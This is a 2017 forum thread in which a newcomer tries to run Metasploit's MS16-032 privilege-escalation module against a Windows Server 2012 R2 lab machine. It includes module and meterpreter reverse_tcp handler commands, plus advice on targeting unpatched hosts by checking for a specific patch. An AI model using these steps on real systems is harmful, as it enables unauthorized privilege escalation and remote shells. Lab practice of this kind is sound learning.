ezejuf Posted December 15, 2017 Share Posted December 15, 2017 hello everyone , im new to this so please bare with i have a lab environment with a windows server 2012 r2 that im trying to perform ms16-032 on it ... i go to kali linux ... start msfconsole and follow the steps 1 - use exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2- set target 1 ( x64) 3- set session 1 4- exploit and i get this error exploit failed: Msf::OptionValidateError the following options failed to validate : SESSION. what should i do ? lhost is set to the ip of my kali linux machine and port is set to 4444 help please Quote Link to comment Share on other sites More sharing options...
TigerZA Posted December 15, 2017 Share Posted December 15, 2017 Did you set the payload? Quote Link to comment Share on other sites More sharing options...
ezejuf Posted December 18, 2017 Author Share Posted December 18, 2017 hey ... well yes i tried ... use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost "mylocalip" exploit it just gives the message started reverse tcp handler on 0.0.0.0:4444 and hangs there Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted December 18, 2017 Share Posted December 18, 2017 It is a question that has to be asked. Did you fully path the victim machine? If so, it will not work. You will need to load a completely unpatched OS. I only used it with Win7. Have not tried it with server but should work. Quote Link to comment Share on other sites More sharing options...
ezejuf Posted December 18, 2017 Author Share Posted December 18, 2017 5 minutes ago, PoSHMagiC0de said: It is a question that has to be asked. Did you fully path the victim machine? If so, it will not work. You will need to load a completely unpatched OS. I only used it with Win7. Have not tried it with server but should work. ah ok ... probably cause its patched :D ... i scanned it with nmap ... what should i look for ... is there a way to know is the victims os is fully updated ? Quote Link to comment Share on other sites More sharing options...
PoSHMagiC0de Posted December 18, 2017 Share Posted December 18, 2017 You can guess from last reboot if it is after 2016 then it might be patched. Only other way is look to see if the patch is installed. In this case I think it might be "KB3139914". Quote Link to comment Share on other sites More sharing options...
ezejuf Posted December 19, 2017 Author Share Posted December 19, 2017 alright thats it ... thank you Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.